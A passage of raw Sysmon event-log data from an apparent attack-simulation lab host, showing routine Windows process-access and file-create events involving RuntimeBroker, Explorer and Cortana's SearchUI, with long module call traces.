ndows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011748Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.888{08A6967A-4753-6000-0D05-000000009A01}11165576C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011747Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.888{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011746Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.888{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011745Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.888{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+1a642|C:\Windows\system32\windows.cortana.onecore.dll+16b12|C:\Windows\system32\windows.cortana.onecore.dll+16a5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011744Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.888{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+6118|C:\Windows\system32\windows.cortana.onecore.dll+169b1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000011743Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.826{08A6967A-4753-6000-0D05-000000009A01}11165920C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+13c5d7|C:\Windows\System32\windows.storage.dll+13e363|C:\Windows\System32\windows.storage.dll+13c548|C:\Windows\System32\windows.storage.dll+13c40d|C:\Windows\System32\windows.storage.dll+73bac|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.storage.dll+14735c 10341000x800000000000000011742Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.826{08A6967A-4753-6000-0D05-000000009A01}11165920C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+60608|C:\Windows\System32\windows.storage.dll+13e344|C:\Windows\System32\windows.storage.dll+13c548|C:\Windows\System32\windows.storage.dll+13c40d|C:\Windows\System32\windows.storage.dll+73bac|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.storage.dll+14735c 10341000x800000000000000011741Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.826{08A6967A-4753-6000-0D05-000000009A01}11165920C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+13d57b|C:\Windows\System32\windows.storage.dll+13ccf5|C:\Windows\System32\windows.storage.dll+13cc5e|C:\Windows\System32\windows.storage.dll+13c3c6|C:\Windows\System32\windows.storage.dll+73bac|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.storage.dll+14735c 10341000x800000000000000011740Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.826{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+6411c|C:\Windows\System32\windows.storage.dll+13bb89|C:\Windows\System32\windows.storage.dll+13b9c4|C:\Windows\System32\windows.storage.dll+818c6|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000011739Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.826{08A6967A-4753-6000-0D05-000000009A01}11165920C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+13c0f0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.storage.dll+14735c|C:\Windows\System32\windows.storage.dll+146cea|C:\Windows\System32\windows.storage.dll+1a6029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011738Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.826{08A6967A-4753-6000-0D05-000000009A01}11165920C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+6430f|C:\Windows\System32\windows.storage.dll+62682|C:\Windows\System32\windows.storage.dll+62c78|C:\Windows\System32\windows.storage.dll+13a887|C:\Windows\System32\windows.storage.dll+13c0d5|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.storage.dll+14735c 10341000x800000000000000011737Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.826{08A6967A-4753-6000-0D05-000000009A01}11165920C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+63043|C:\Windows\System32\windows.storage.dll+13a985|C:\Windows\System32\windows.storage.dll+13a86d|C:\Windows\System32\windows.storage.dll+13c0d5|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.storage.dll+14735c|C:\Windows\System32\windows.storage.dll+146cea 10341000x800000000000000011736Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.810{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+6411c|C:\Windows\System32\windows.storage.dll+13bb89|C:\Windows\System32\windows.storage.dll+13b9c4|C:\Windows\System32\windows.storage.dll+818c6|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 11241100x800000000000000011735Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.810{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{36bce9e3-919c-426d-b30c-155b481f0339}\0.2.filtertrie.intermediate.txt2021-01-14 13:30:11.810 11241100x800000000000000011734Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.810{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{36bce9e3-919c-426d-b30c-155b481f0339}\0.1.filtertrie.intermediate.txt2021-01-14 13:30:11.810 11241100x800000000000000011733Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.810{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{36bce9e3-919c-426d-b30c-155b481f0339}\0.0.filtertrie.intermediate.txt2021-01-14 13:30:11.810 11241100x800000000000000011732Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.763{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c472e3fe-9212-44e6-9e11-2703485556a3}\appssynonyms.txt2016-04-15 08:09:24.000 10341000x800000000000000011731Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.717{08A6967A-4288-6000-1400-000000009A01}12761404C:\Windows\System32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\ncbservice.dll+86ee|c:\windows\system32\ncbservice.dll+6753|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011730Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.717{08A6967A-4288-6000-1400-000000009A01}12761404C:\Windows\System32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|c:\windows\system32\ncbservice.dll+86c0|c:\windows\system32\ncbservice.dll+6753|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011729Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.701{08A6967A-4754-6000-1705-000000009A01}34084336C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+6468|C:\Windows\System32\SHCORE.dll+6437|C:\Windows\System32\SHCORE.dll+6327|C:\Windows\System32\SHCORE.dll+629d|C:\Windows\System32\SHCORE.dll+61aa|C:\Windows\System32\SHELL32.dll+46770|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF8021D6E18D8)|UNKNOWN(FFFFAA4CF6CB21F8)|UNKNOWN(FFFFAA4CF6CB2377)|UNKNOWN(FFFFAA4CF6CACA01)|UNKNOWN(FFFFAA4CF6CAE3CA)|UNKNOWN(FFFFAA4CF6CAC686)|UNKNOWN(FFFFF8021D3F8E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+49fdb|C:\Windows\System32\SHELL32.dll+10a26a|C:\Windows\System32\SHCORE.dll+2fedd 10341000x800000000000000011728Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.701{08A6967A-4754-6000-1705-000000009A01}34084336C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+6468|C:\Windows\System32\SHCORE.dll+124a5|C:\Windows\System32\SHELL32.dll+46251|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF8021D6E18D8)|UNKNOWN(FFFFAA4CF6CB21F8)|UNKNOWN(FFFFAA4CF6CB2377)|UNKNOWN(FFFFAA4CF6CACA01)|UNKNOWN(FFFFAA4CF6CAE3CA)|UNKNOWN(FFFFAA4CF6CAC686)|UNKNOWN(FFFFF8021D3F8E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+49fdb|C:\Windows\System32\SHELL32.dll+10a26a|C:\Windows\System32\SHCORE.dll+2fedd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000011727Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.701{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c472e3fe-9212-44e6-9e11-2703485556a3}\settingssynonyms.txt2021-01-14 13:30:11.701 11241100x800000000000000011726Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.701{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c472e3fe-9212-44e6-9e11-2703485556a3}\appssynonyms.txt2021-01-14 13:30:11.701 11241100x800000000000000011725Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.701{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c472e3fe-9212-44e6-9e11-2703485556a3}\settingsconversions.txt2021-01-14 13:30:11.701 11241100x800000000000000011724Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.701{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c472e3fe-9212-44e6-9e11-2703485556a3}\appsconversions.txt2021-01-14 13:30:11.701 11241100x800000000000000011723Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.701{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c472e3fe-9212-44e6-9e11-2703485556a3}\settingsglobals.txt2021-01-14 13:30:11.701 11241100x800000000000000011722Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.701{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c472e3fe-9212-44e6-9e11-2703485556a3}\appsglobals.txt2021-01-14 13:30:11.701 